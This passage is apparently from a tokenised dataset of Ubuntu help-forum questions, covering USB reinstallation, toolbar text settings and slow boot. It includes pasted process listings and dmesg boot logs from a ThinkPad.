3120 ? ss 16:52 0:00 /usr/sbin/cupsd -f colord 976 0.1 0.3 55080 10396 ? sl 16:52 0:00 /usr/lib/i386-linux-gnu/colord/colord root 979 0.0 0.0 4632 872 tty4 ss+ 16:52 0:00 /sbin/getty -8 38400 tty4 root 987 0.0 0.0 4632 884 tty5 ss+ 16:52 0:00 /sbin/getty -8 38400 tty5 root 994 0.0 0.0 4632 884 tty2 ss+ 16:52 0:00 /sbin/getty -8 38400 tty2 root 995 0.0 0.0 4632 868 tty3 ss+ 16:52 0:00 /sbin/getty -8 38400 tty3 root 998 0.0 0.0 4632 876 tty6 ss+ 16:52 0:00 /sbin/getty -8 38400 tty6 root 1022 0.0 0.0 2176 680 ? ss 16:52 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket root 1029 0.0 0.0 3632 664 ? ss 16:52 0:00 /usr/sbin/irqbalance daemon 1030 0.0 0.0 2476 120 ? ss 16:52 0:00 atd root 1031 0.0 0.0 2620 880 ? ss 16:52 0:00 cron root 1061 0.1 0.0 0 0 ? s 16:52 0:00 [ kworker/3:2 ] root 1064 0.0 1.0 34116 31072 ? slsl 16:52 0:00 lightdm root 1076 13.4 1.2 118688 37920 tty7 ssl+ 16:52 0:55 /usr/bin/x :0 -core -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswit root 1085 0.0 0.0 0 0 ? s 16:52 0:00 [ rts_pstor ] root 1087 0.0 0.0 0 0 ? s 16:52 0:00 [ rtsx-polling ] root 1095 0.0 0.0 0 0 ? s < 16:52 0:00 [ cfg80211 ] root 1127 0.0 0.0 0 0 ? s 16:52 0:00 [ flush-8:0 ] root 1130 0.0 0.0 6136 1824 ? ss 16:52 0:00 /sbin/wpa_supplicant -b -p /run/sendsigs.omit.d/wpasupplicant.pid -u -s -o /va root 1137 0.0 0.1 24604 3164 ? sl 16:52 0:00 /usr/lib/accountsservice/accounts-daemon root 1140 0.0 0.0 0 0 ? s < 16:52 0:00 [ hd-audio0 ] root 1188 0.0 0.1 34308 3420 ? sl 16:52 0:00 /usr/sbin/console-kit-daemon -- no-daemon root 1425 0.0 0.0 4632 872 tty1 ss+ 16:52 0:00 /sbin/getty -8 38400 tty1 root 1443 0.1 0.1 29460 4664 ? sl 16:52 0:00 /usr/lib/upower/upowerd root 1579 0.0 0.1 16540 3272 ? sl 16:53 0:00 lightdm -- session-child 12 19 bw 1623 0.0 0.0 2232 644 ? ss 16:53 0:00 /bin/sh /usr/bin/startkde bw 1672 0.0 0.0 4092 204 ? ss 16:53 0:00 /usr/bin/ssh-agent /usr/bin/gpg-agent -- daemon -- sh -- write-env-file=/home/bw/ bw 1673 0.0 0.0 5492 384 ? ss 16:53 0:00 /usr/bin/gpg-agent -- daemon -- sh -- write-env-file=/home/bw/.gnupg/gpg-agent-in bw 1676 0.0 0.0 3848 792 ? s 16:53 0:00 /usr/bin/dbus-launch -- exit-with-session /usr/bin/startkde bw 1677 0.5 0.0 5384 2180 ? ss 16:53 0:02 //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session root 1704 0.3 0.1 25348 3600 ? sl 16:53 0:01 /usr/lib/udisks/udisks-daemon root 1705 0.0 0.0 6620 728 ? s 16:53 0:00 udisks-daemon : not polling any devices bw 1736 0.0 0.0 2008 64 ? s 16:53 0:00 /usr/lib/kde4/libexec/start_kdeinit +kcminit_startup bw 1737 0.0 0.5 115200 15588 ? ss 16:53 0:00 kdeinit4 : kdeinit4 running ... bw 1738 0.1 0.2 116756 8728 ? s 16:53 0:00 kdeinit4 : klauncher [ kdeinit ] -- fd=9 bw 1740 0.6 1.0 340524 31264 ? sl 16:53 0:02 kdeinit4 : kded4 [ kdeinit ] bw 1742 0.0 0.0 8944 2144 ? s 16:53 0:00 /usr/lib/i386-linux-gnu/gconf/gconfd-2 bw 1746 0.2 0.4 92028 14688 ? s 16:53 0:00 /usr/bin/kglobalaccel bw 1748 0.0 0.4 90804 13500 ? s 16:53 0:00 /usr/bin/kwalletd bw 1752 0.1 0.5 103764 15152 ? s 16:53 0:00 /usr/bin/kactivitymanagerd bw 1758 0.0 0.0 2144 280 ? s 16:53 0:00 kwrapper4 ksmserver bw 1759 0.1 0.5 150016 16088 ? sl 16:53 0:00 kdeinit4 : ksmserver [ kdeinit ] bw 1763 2.2 1.0 178492 32100 ? sl 16:53 0:08 kwin bw 1772 0.2 0.5 106292 16340 ? sl 16:53 0:00 /usr/bin/knotify4 bw 1777 0.9 1.1 246120 32912 ? sl 16:53 0:03 /usr/bin/krunner bw 1778 6.3 2.7 389884 80216 ? sl 16:53 0:23 /usr/bin/plasma-desktop bw 1785 0.0 0.0 2844 1208 ? s 16:53 0:00 ksysguardd bw 1789 0.1 0.4 82036 14176 ? s 16:53 0:00 /usr/bin/kuiserver bw 1805 0.3 0.1 61560 5612 ? sl 16:53 0:01 /usr/bin/akonadi_control root 1806 0.0 0.0 0 0 ? s 16:53 0:00 [ kworker/0:2 ] bw 1808 0.1 0.2 211852 8460 ? sl 16:53 0:00 akonadiserver bw 1810 0.4 0.8 244116 25360 ? sl 16:53 0:01 /usr/sbin/mysqld -- defaults-file=/home/bw/.local/share/akonadi/mysql.conf -- da bw 1874 0.0 0.0 35284 2956 ? sl 16:53 0:00 /usr/bin/xsettings-kde bw 1876 0.0 0.3 68776 9488 ? sl 16:53 0:00 /usr/bin/nepomukserver bw 1884 0.4 0.9 173876 29240 ? snl 16:53 0:01 /usr/bin/nepomukservicestub nepomukstorage bw 1902 6.1 2.1 451512 63924 ? sl 16:53 0:21 /home/bw/.dropbox-dist/dropbox bw 1906 3.8 1.0 142368 32376 ? rl 16:53 0:13 /usr/bin/yakuake bw 1933 0.0 0.1 54636 4680 ? sl 16:53 0:00 /usr/bin/zeitgeist-datahub bw 1943 0.5 1.5 164836 46836 ? sl 16:53 0:01 python /usr/bin/printer-applet bw 1945 0.1 0.1 99636 5048 ? s < l 16:53 0:00 /usr/bin/pulseaudio -- start -- log-target=syslog rtkit 1947 0.0 0.0 21336 1248 ? snl 16:53 0:00 /usr/lib/rtkit/rtkit-daemon bw 1958 0.0 0.1 44204 3792 ? sl 16:53 0:00 /usr/bin/zeitgeist-daemon bw 1972 0.0 0.0 27008 2684 ? sl 16:53 0:00 /usr/lib/gvfs/gvfsd bw 1974 0.1 0.5 90480 16660 ? sl 16:53 0:00 /usr/bin/akonadi_agent_launcher akonadi_akonotes_resource akonadi_akonotes_res bw 1984 0.1 0.5 90472 16636 ? sl 16:53 0:00 /usr/bin/akonadi_agent_launcher akonadi_akonotes_resource akonadi_akonotes_res bw 1985 0.3 0.9 148800 28304 ? s 16:53 0:01 /usr/bin/akonadi_archivemail_agent -- identifier akonadi_archivemail_agent bw 1992 0.1 0.5 90020 16148 ? sl 16:53 0:00 /usr/bin/akonadi_agent_launcher akonadi_contacts_resource akonadi_contacts_res bw 1993 0.1 0.5 90132 16452 ? sl 16:53 0:00 /usr/bin/akonadi_agent_launcher akonadi_contacts_resource akonadi_contacts_res bw 1994 0.1 0.5 90564 16332 ? sl 16:53 0:00 /usr/bin/akonadi_agent_launcher akonadi_ical_resource akonadi_ical_resource_0 bw 1995 0.1 0.5 90676 16732 ? sl 16:53 0:00 /usr/bin/akonadi_agent_launcher akonadi_ical_resource akonadi_ical_resource_1 bw 1996 0.1 0.5 90468 16800 ? sl 16:53 0:00 /usr/bin/akonadi_agent_launcher akonadi_maildir_resource akonadi_maildir_resou bw 1999 0.2 0.6 99324 19276 ? s 16:53 0:00 /usr/bin/akonadi_maildispatcher_agent -- identifier akonadi_maildispatcher_agen bw 2006 0.3 0.9 148808 28332 ? s 16:53 0:01 /usr/bin/akonadi_mailfilter_agent -- identifier akonadi_mailfilter_agent bw 2017 0.0 0.1 50256 4716 ? sl 16:53 0:00 /usr/lib/zeitgeist/zeitgeist-fts bw 2024 0.2 0.6 103632 18376 ? sl 16:53 0:00 /usr/bin/akonadi_nepomuk_feeder -- identifier akonadi_nepomuk_feeder bw 2043 0.0 0.0 4484 280 ? s 16:53 0:00 /bin/cat bw 2101 0.2 0.7 113600 22396 ? sl 16:53 0:00 /usr/lib/kde4/libexec/polkit-kde-authentication-agent-1 bw 2105 0.2 0.7 114196 22072 ? sl 16:53 0:00 /usr/bin/nepomukcontroller bw 2156 0.3 1.0 333188 31244 ? sl 16:54 0:01 /usr/bin/kmix bw 2167 0.0 0.0 6548 2724 pts/2 ss 16:54 0:00 /bin/bash bw 2177 0.2 0.7 113496 22960 ? sl 16:54 0:00 /usr/bin/klipper bw 2394 3.5 1.2 52932 35596 ? snl 16:54 0:11 /usr/bin/virtuoso-t +foreground +configfile /tmp/virtuoso_hx1884.ini +wait root 2460 0.0 0.0 6184 1876 pts/2 s 16:54 0:00 sudo -s root 2500 0.0 0.0 6528 2700 pts/2 s 16:54 0:00 /bin/bash root 2599 0.0 0.0 5444 1280 pts/2 s+ 16:54 0:00 /bin/bash bin/aero root 2606 0.1 0.0 9836 2500 pts/2 s+ 16:54 0:00 wvdial aero2 root 2619 0.0 0.0 3504 1280 pts/2 s 16:54 0:00 /usr/sbin/pppd 57600 modem crtscts defaultroute usehostname -detach user aero bw 2653 0.0 0.0 6600 2880 pts/3 ss 16:54 0:00 /bin/bash bw 2676 0.4 0.8 130296 24016 ? snl 16:54 0:01 /usr/bin/nepomukservicestub nepomukfilewatch bw 2679 0.1 0.7 101636 22252 ? snl 16:54 0:00 /usr/bin/nepomukservicestub nepomukqueryservice bw 2681 0.2 0.8 109836 24280 ? snl 16:54 0:00 /usr/bin/nepomukservicestub nepomukbackupsync bw 3833 46.0 9.7 829272 288012 ? rl 16:55 1:46 /usr/lib/firefox/firefox bw 3903 0.0 0.0 35128 2804 ? sl 16:55 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher bw 4708 0.1 0.0 6564 2736 pts/4 ss 16:56 0:00 /bin/bash root 5210 0.0 0.0 0 0 ? s 16:57 0:00 [ kworker/u:0 ] root 6140 0.2 0.0 0 0 ? s 16:58 0:00 [ kworker/0:1 ] root 6371 0.5 0.0 6184 1868 pts/4 s+ 16:59 0:00 sudo nethogs ppp0 root 6411 17.7 0.2 8616 6144 pts/4 s+ 16:59 0:05 nethogs ppp0 bw 6787 0.0 0.0 5464 1220 pts/3 r+ 16:59 0:00 ps auxw
359038	reinstalling ubuntu with usb pendrive	i 'm a newbie to ubuntu , switched from win7 2 days ago . i installed 12.04 lts and it got upgraded to 13.04 after i did do n't know what . anyway that is n't a problem , however , i installed some packages which made my system to run kinda slow , and i think that with my linux experience , reinstall would be the quickest way to fix things . to be specific , i can not completely remove kde and xubuntu and so on . i know that there are commands for these things but i do n't like to dive that deep know . so , all in all , i would like to reinstall the os from a pendrive which is already able to boot linux ( installed ubuntu with it previously ubuntu is the only os i have now on my pc ( which is a pretty reckless choice as a n00b ) my problem is that i do n't know how to select the boot priority from gnu or whatever like i did in bios which seems gone know . is there any way to do that ? or should i write it to a dvd ? still , it would be nice to know how to boot from external devices . thanks forward guys !
359039	how to get rid of toolbar text ?	how to get rid of the text that appears at the bottom of all toolbar icons ? it suddenly has shown up after a system crash although i did n't change anything and now i ca n't make it disappear : i tried to set the following setting with dconf-editor : org.gnome.desktop.interface toolbar-style to the value ›text‹ and logged out and in , but did n't help at all . what to do ? update : the setting in gconf is correct as shown by the screenshot :
359044	very slow boot -- -- ubuntu 13.04	my ubuntu13.04 starts up very slow . this is the file for dmesg . the part of output is as follows . please give me some help ! thanks ! [ 10.008425 ] console : switching to colour frame buffer device 160x50 [ 10.011101 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device [ 10.011103 ] i915 0000:00:02.0 : registered panic notifier [ 10.014902 ] acpi device:01 : registered as cooling_device4 [ 10.016505 ] acpi : video device [ vid ] ( multi-head : yes rom : no post : no ) [ 10.016554 ] input : video bus as /devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/lnxvideo:00/input/input5 [ 10.016881 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 10.156244 ] non-volatile memory driver v1.3 [ 10.323683 ] uvcvideo : found uvc 1.00 device integrated camera ( 17ef:480f ) [ 10.324875 ] input : integrated camera as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0/input/input6 [ 10.324955 ] usbcore : registered new interface driver uvcvideo [ 10.324957 ] usb video class driver ( 1.1.1 ) [ 10.336474 ] thinkpad_acpi : thinkpad acpi extras v0.24 [ 10.336477 ] thinkpad_acpi : http : //ibm-acpi.sf.net/ [ 10.336479 ] thinkpad_acpi : thinkpad bios 6iet68ww ( 1.28 ) , ec 6iht36ww-1.11 [ 10.336480 ] thinkpad_acpi : lenovo thinkpad t410 , model 2516adu [ 10.337853 ] thinkpad_acpi : detected a 8-level brightness capable thinkpad [ 10.338022 ] thinkpad_acpi : radio switch found ; radios are enabled [ 10.338040 ] thinkpad_acpi : this thinkpad has standard acpi backlight brightness control , supported by the acpi video driver [ 10.338042 ] thinkpad_acpi : disabling thinkpad-acpi brightness events by default ... [ 10.342485 ] thinkpad_acpi : standard acpi backlight interface available , not loading native one [ 10.342588 ] thinkpad_acpi : console audio control enabled , mode : monitor ( read only ) [ 10.343906 ] input : thinkpad extra buttons as /devices/platform/thinkpad_acpi/input/input7 [ 10.702531 ] type=1400 audit ( 1381773369.435:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=761 comm= '' apparmor_parser '' [ 10.702618 ] type=1400 audit ( 1381773369.435:3 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=760 comm= '' apparmor_parser '' [ 10.702625 ] type=1400 audit ( 1381773369.435:4 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=777 comm= '' apparmor_parser '' [ 10.702865 ] type=1400 audit ( 1381773369.435:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=761 comm= '' apparmor_parser '' [ 10.703050 ] type=1400 audit ( 1381773369.435:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=761 comm= '' apparmor_parser '' [ 10.703087 ] type=1400 audit ( 1381773369.439:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=760 comm= '' apparmor_parser '' [ 10.703094 ] type=1400 audit ( 1381773369.439:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=777 comm= '' apparmor_parser '' [ 10.703354 ] type=1400 audit ( 1381773369.439:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=760 comm= '' apparmor_parser '' [ 10.703360 ] type=1400 audit ( 1381773369.439:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=777 comm= '' apparmor_parser '' [ 12.029891 ] kvm : disabled by bios [ 12.033653 ] kvm : disabled by bios [ 12.037477 ] kvm : disabled by bios [ 12.041556 ] kvm : disabled by bios [ 12.086359 ] snd_hda_intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 12.223049 ] hda_codec : cx20585 : bios auto-probing . [ 12.254334 ] init : failsafe main process ( 846 ) killed by term signal [ 12.327705 ] input : hda intel mid hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 12.327794 ] input : hda intel mid hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 12.327866 ] input : hda intel mid hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 12.327934 ] input : hda intel mid dock mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 12.327999 ] input : hda intel mid mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input12 [ 12.328064 ] input : hda intel mid headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input13 [ 12.328131 ] input : hda intel mid dock headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input14 [ 13.327555 ] bluetooth : core ver 2.16 [ 13.327577 ] net : registered protocol family 31 [ 13.327578 ] bluetooth : hci device and connection manager initialized [ 13.327587 ] bluetooth : hci socket layer initialized [ 13.327589 ] bluetooth : l2cap socket layer initialized [ 13.327598 ] bluetooth : sco socket layer initialized [ 13.332376 ] bluetooth : rfcomm tty layer initialized [ 13.332387 ] bluetooth : rfcomm socket layer initialized [ 13.332388 ] bluetooth : rfcomm ver 1.11 [ 13.423450 ] init : avahi-cups-reload main process ( 930 ) terminated with status 1 [ 13.475367 ] psmouse serio2 : alps : unknown alps touchpad : e7=10 00 64 , ec=10 00 64 [ 13.560875 ] ppdev : user-space parallel port driver [ 13.640278 ] type=1400 audit ( 1381773372.379:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=957 comm= '' apparmor_parser '' [ 13.947793 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 13.947797 ] bluetooth : bnep filters : protocol multicast [ 13.947809 ] bluetooth : bnep socket layer initialized [ 13.949613 ] intel ips 0000:00:1f.6 : i915 driver attached , reenabling gpu turbo [ 14.384944 ] cfg80211 : world regulatory domain updated : [ 14.384948 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 14.384949 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.384951 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.384952 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.384954 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.384955 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 14.384968 ] cfg80211 : calling crda for country : ec [ 14.389175 ] cfg80211 : regulatory domain changed to country : ec [ 14.389178 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 14.389180 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 14.389182 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 20000 khz ) , ( 300 mbi , 1700 mbm ) [ 14.389183 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 20000 khz ) , ( 300 mbi , 2300 mbm ) [ 14.389184 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 20000 khz ) , ( 300 mbi , 3000 mbm ) [ 16.704564 ] audit_printk_skb : 3 callbacks suppressed [ 16.704568 ] type=1400 audit ( 1381773375.447:13 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1052 comm= '' apparmor_parser '' [ 16.704929 ] type=1400 audit ( 1381773375.451:14 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1052 comm= '' apparmor_parser '' [ 16.705116 ] type=1400 audit ( 1381773375.451:15 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1052 comm= '' apparmor_parser '' [ 16.823036 ] type=1400 audit ( 1381773375.567:16 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=1049 comm= '' apparmor_parser '' [ 16.823373 ] type=1400 audit ( 1381773375.567:17 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper//chromium_browser '' pid=1049 comm= '' apparmor_parser '' [ 16.823544 ] type=1400 audit ( 1381773375.567:18 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/x86_64-linux-gnu/lightdm-remote-session-freerdp/freerdp-session-wrapper '' pid=1050 comm= '' apparmor_parser '' [ 16.823817 ] type=1400 audit ( 1381773375.567:19 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/x86_64-linux-gnu/lightdm-remote-session-freerdp/freerdp-session-wrapper//chromium_browser '' pid=1050 comm= '' apparmor_parser '' [ 16.824702 ] type=1400 audit ( 1381773375.571:20 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/x86_64-linux-gnu/lightdm-remote-session-uccsconfigure/uccsconfigure-session-wrapper '' pid=1051 comm= '' apparmor_parser '' [ 16.825120 ] type=1400 audit ( 1381773375.571:21 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/x86_64-linux-gnu/lightdm-remote-session-uccsconfigure/uccsconfigure-session-wrapper//chromium_browser '' pid=1051 comm= '' apparmor_parser '' [ 16.828216 ] type=1400 audit ( 1381773375.571:22 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1056 comm= '' apparmor_parser '' [ 17.425603 ] psmouse serio2 : trackpoint : ibm trackpoint firmware : 0x0e , buttons : 3/3 [ 17.486602 ] e1000e 0000:00:19.0 : irq 40 for msi/msi-x [ 17.587282 ] e1000e 0000:00:19.0 : irq 40 for msi/msi-x [ 17.587397 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 17.587729 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 17.686831 ] input : tpps/2 ibm trackpoint as /devices/platform/i8042/serio1/serio2/input/input15 [ 17.874991 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 17.875319 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 23.116015 ] wlan0 : authenticate with 3c : ce:73 : f9 : dc:93 [ 23.133706 ] wlan0 : direct probe to 3c : ce:73 : f9 : dc:93 ( try 1/3 ) [ 23.337307 ] wlan0 : direct probe to 3c : ce:73 : f9 : dc:93 ( try 2/3 ) [ 23.540934 ] wlan0 : direct probe to 3c : ce:73 : f9 : dc:93 ( try 3/3 ) [ 23.744754 ] wlan0 : authentication with 3c : ce:73 : f9 : dc:93 timed out [ 24.192352 ] wlan0 : authenticate with c8 : f9 : f9 : be : b2 : e2 [ 24.207852 ] wlan0 : direct probe to c8 : f9 : f9 : be : b2 : e2 ( try 1/3 ) [ 24.411434 ] wlan0 : direct probe to c8 : f9 : f9 : be : b2 : e2 ( try 2/3 ) [ 24.615096 ] wlan0 : direct probe to c8 : f9 : f9 : be : b2 : e2 ( try 3/3 ) [ 24.818746 ] wlan0 : authentication with c8 : f9 : f9 : be : b2 : e2 timed out [ 25.272295 ] wlan0 : authenticate with 3c : ce:73 : f9 : be:53 [ 25.290007 ] wlan0 : direct probe to 3c : ce:73 : f9 : be:53 ( try 1/3 ) [ 25.493570 ] wlan0 : direct probe to 3c : ce:73 : f9 : be:53 ( try 2/3 ) [ 25.697236 ] wlan0 : direct probe to 3c : ce:73 : f9 : be:53 ( try 3/3 ) [ 25.834042 ] init : plymouth-stop pre-start process ( 1458 ) terminated with status 1 [ 25.900866 ] wlan0 : authentication with 3c : ce:73 : f9 : be:53 timed out [ 26.346460 ] wlan0 : authenticate with 3c : ce:73 : f9 : e2 : e2 [ 26.356473 ] wlan0 : direct probe to 3c : ce:73 : f9 : e2 : e2 ( try 1/3 ) [ 26.559740 ] wlan0 : direct probe to 3c : ce:73 : f9 : e2 : e2 ( try 2/3 ) [ 26.763379 ] wlan0 : direct probe to 3c : ce:73 : f9 : e2 : e2 ( try 3/3 ) [ 26.967050 ] wlan0 : authentication with 3c : ce:73 : f9 : e2 : e2 timed out [ 27.551705 ] wlan0 : authenticate with 3c : ce:73 : f9 : be : d3 [ 27.570046 ] wlan0 : direct probe to 3c : ce:73 : f9 : be : d3 ( try 1/3 ) [ 27.773666 ] wlan0 : direct probe to 3c : ce:73 : f9 : be : d3 ( try 2/3 ) [ 27.977286 ] wlan0 : direct probe to 3c : ce:73 : f9 : be : d3 ( try 3/3 ) [ 28.180931 ] wlan0 : authentication with 3c : ce:73 : f9 : be : d3 timed out [ 28.626109 ] wlan0 : authenticate with 3c : ce:73 : f7:23 : a3 [ 28.644219 ] wlan0 : send auth to 3c : ce:73 : f7:23 : a3 ( try 1/3 ) [ 28.646999 ] wlan0 : authenticated [ 28.648138 ] wlan0 : associate with 3c : ce:73 : f7:23 : a3 ( try 1/3 ) [ 28.650981 ] wlan0 : rx assocresp from 3c : ce:73 : f7:23 : a3 ( capab=0x421 status=0 aid=1 ) [ 28.651995 ] wlan0 : associated [ 28.652005 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 28.652492 ] cfg80211 : calling crda for country : us [ 28.655752 ] cfg80211 : regulatory domain changed to country : us [ 28.655755 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 28.655757 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 28.655758 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 28.655760 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 28.655761 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 28.655762 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 28.655763 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 35.588366 ] init : winbind main process ( 1966 ) terminated with status 127 [ 35.588397 ] init : winbind main process ended , respawning [ 35.592019 ] init : winbind main process ( 1970 ) terminated with status 127 [ 35.592042 ] init : winbind main process ended , respawning [ 35.595160 ] init : winbind main process ( 1972 ) terminated with status 127 [ 35.595183 ] init : winbind main process ended , respawning [ 35.598604 ] init : winbind main process ( 1974 ) terminated with status 127 [ 35.598627 ] init : winbind main process ended , respawning [ 35.601817 ] init : winbind main process ( 1976 ) terminated with status 127 [ 35.601840 ] init : winbind main process ended , respawning [ 35.605210 ] init : winbind main process ( 1978 ) terminated with status 127 [ 35.605232 ] init : winbind main process ended , respawning [ 35.608343 ] init : winbind main process ( 1980 ) terminated with status 127 [ 35.608366 ] init : winbind main process ended , respawning [ 35.611555 ] init : winbind main process ( 1982 ) terminated with status 127 [ 35.611576 ] init : winbind main process ended , respawning [ 35.614806 ] init : winbind main process ( 1984 ) terminated with status 127 [ 35.614830 ] init : winbind main process ended , respawning [ 35.618046 ] init : winbind main process ( 1986 ) terminated with status 127 [ 35.618070 ] init : winbind main process ended , respawning [ 35.621170 ] init : winbind main process ( 1988 ) terminated with status 127 [ 35.621193 ] init : winbind respawning too fast , stopped [ 117.106097 ] e1000e : eth0 nic link is up 1000 mbps full duplex , flow control : none [ 117.106153 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 152.711465 ] wlan0 : authenticate with 68 : bc:0c:0b:6d:91 [ 152.721606 ] wlan0 : direct probe to 68 : bc:0c:0b:6d:91 ( try 1/3 ) [ 152.721659 ] cfg80211 : calling crda to update world regulatory domain [ 152.726561 ] cfg80211 : world regulatory domain updated : [ 152.726566 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 152.726568 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 152.726571 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 152.726573 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 152.726575 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 152.726577 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 152.952495 ] wlan0 : send auth to 68 : bc:0c:0b:6d:91 ( try 2/3 ) [ 152.954596 ] wlan0 : authenticated [ 153.195876 ] wlan0 : authenticate with 3c : ce:73 : f7:23 : a3 [ 153.218107 ] wlan0 : send auth to 3c : ce:73 : f7:23 : a3 ( try 1/3 ) [ 153.219112 ] wlan0 : authenticated [ 153.223764 ] wlan0 : associate with 3c : ce:73 : f7:23 : a3 ( try 1/3 ) [ 153.226217 ] wlan0 : rx assocresp from 3c : ce:73 : f7:23 : a3 ( capab=0x421 status=0 aid=1 ) [ 153.227240 ] wlan0 : associated [ 153.227308 ] cfg80211 : calling crda for country : us [ 153.232234 ] cfg80211 : regulatory domain changed to country : us [ 153.232239 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 153.232242 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 153.232244 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 153.232247 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 153.232249 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 153.232251 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 153.232253 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm )
